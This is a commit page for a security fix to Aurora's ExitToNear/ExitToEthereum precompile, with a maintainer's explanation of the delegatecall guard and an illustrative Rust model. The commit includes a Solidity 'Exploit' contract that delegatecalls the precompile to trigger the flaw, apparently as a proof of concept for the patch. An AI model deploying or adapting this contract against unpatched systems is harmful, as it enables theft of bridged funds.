* Fix(precompile): ExitToNear ExitToEthereum vulnerability patch Fix vulnerability Include exploit contract
* Release 2.5.3 notes
* Update solidity version

Co-authored-by: Michael Birch <michael.birch@aurora.dev>
1 parent 5c8691e, commit f95e32f
Showing 6 changed files with 105 additions and 6 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
2.5.2 | ||
2.5.3 |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
// SPDX-License-Identifier: GPL-3.0 | ||
|
||
pragma solidity ^0.8.6; | ||
|
||
contract Exploit { | ||
address payable private owner; | ||
|
||
constructor() { | ||
owner = payable(msg.sender); | ||
} | ||
|
||
function exploit(bytes memory recipient) public payable { | ||
require(msg.sender == owner); | ||
|
||
bytes memory input = abi.encodePacked("\x00", recipient); | ||
uint input_size = 1 + recipient.length; | ||
|
||
assembly { | ||
let res := delegatecall(gas(), 0xe9217bc70b7ed1f598ddd3199e80b093fa71124f, add(input, 32), input_size, 0, 32) | ||
} | ||
|
||
owner.transfer(msg.value); | ||
} | ||
} | ||
|
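Review bot: In `exploit`, the assembly block assigns the `delegatecall` result to `res` and never reads it, so execution continues to `owner.transfer(msg.value)` whether the precompile call succeeded or failed. Since the commit includes this contract together with the fix, consider returning `res` or reverting on an unexpected value, so that a test can assert directly that the delegate call is rejected. The hard-coded target address in the `delegatecall` and the leading `"\x00"` byte in `input` would each benefit from a one-line comment saying which precompile and which flag they refer to, and the bare `require(msg.sender == owner)` could carry a reason string.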

Hi.
Can you explain how the check `context.address != Self::ADDRESS.raw()` can prevent delegate call?

Thanks for the question @Q5Ca
In the EVM, a delegate call executes the logic of the target contract in the present context (i.e. the current address and ETH value are unchanged). The logic in question here is part of a precompile with a statically known address (`Self::ADDRESS`; the `.raw()` is just making the types line up and has no relevance to the high level logic). Therefore, the condition `context.address != Self::ADDRESS` catches delegate calls because, in the case of a delegate call, the EVM context will be the address of the caller rather than `Self::ADDRESS`. If that condition is true then we immediately exit the precompile, preventing any of the precompile's important logic from being executed in the wrong context.

Hi @birchmd
Thank you for the clear explanation. I got it.
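
The context check discussed in the comments above, as a simplified model. This is an added example, not code from this commit or from the project; `Context`, `call_context`, `delegatecall_context`, `guarded_precompile`, `ExitError` and all addresses are hypothetical names and constructed values chosen for illustration.

```rust
// Simplified model (hypothetical names) of how an EVM fills the execution
// context for CALL versus DELEGATECALL, and how a precompile can refuse to
// run when it is not executing at its own statically known address.
type Address = [u8; 20];

#[derive(Debug, Clone, PartialEq)]
struct Context {
    address: Address,     // account the running code acts as (storage, balance)
    caller: Address,      // msg.sender seen by the running code
    apparent_value: u128, // msg.value seen by the running code
}

// Constructed placeholder addresses, not real deployments.
const PRECOMPILE: Address = [0xEE; 20];
const CONTRACT: Address = [0xC0; 20];
const USER: Address = [0x01; 20];

/// Frame of a contract that a user invoked with some attached value.
fn contract_frame(value: u128) -> Context {
    Context { address: CONTRACT, caller: USER, apparent_value: value }
}

/// CALL: the target's code runs as the target itself.
fn call_context(from: &Context, target: Address, value: u128) -> Context {
    Context { address: target, caller: from.address, apparent_value: value }
}

/// DELEGATECALL: the target's code runs, but address, caller and value
/// are all inherited unchanged from the calling frame.
fn delegatecall_context(from: &Context) -> Context {
    from.clone()
}

#[derive(Debug, PartialEq)]
enum ExitError { WrongContext }

/// Guard in the style of `context.address != Self::ADDRESS`: exit before any
/// of the precompile's logic runs if the code is executing in another
/// account's context.
fn guarded_precompile(ctx: &Context) -> Result<u128, ExitError> {
    if ctx.address != PRECOMPILE {
        return Err(ExitError::WrongContext);
    }
    Ok(ctx.apparent_value) // value the precompile's logic would act on
}

fn main() {
    let frame = contract_frame(5);
    println!("call:         {:?}", guarded_precompile(&call_context(&frame, PRECOMPILE, 5)));
    println!("delegatecall: {:?}", guarded_precompile(&delegatecall_context(&frame)));
}
```
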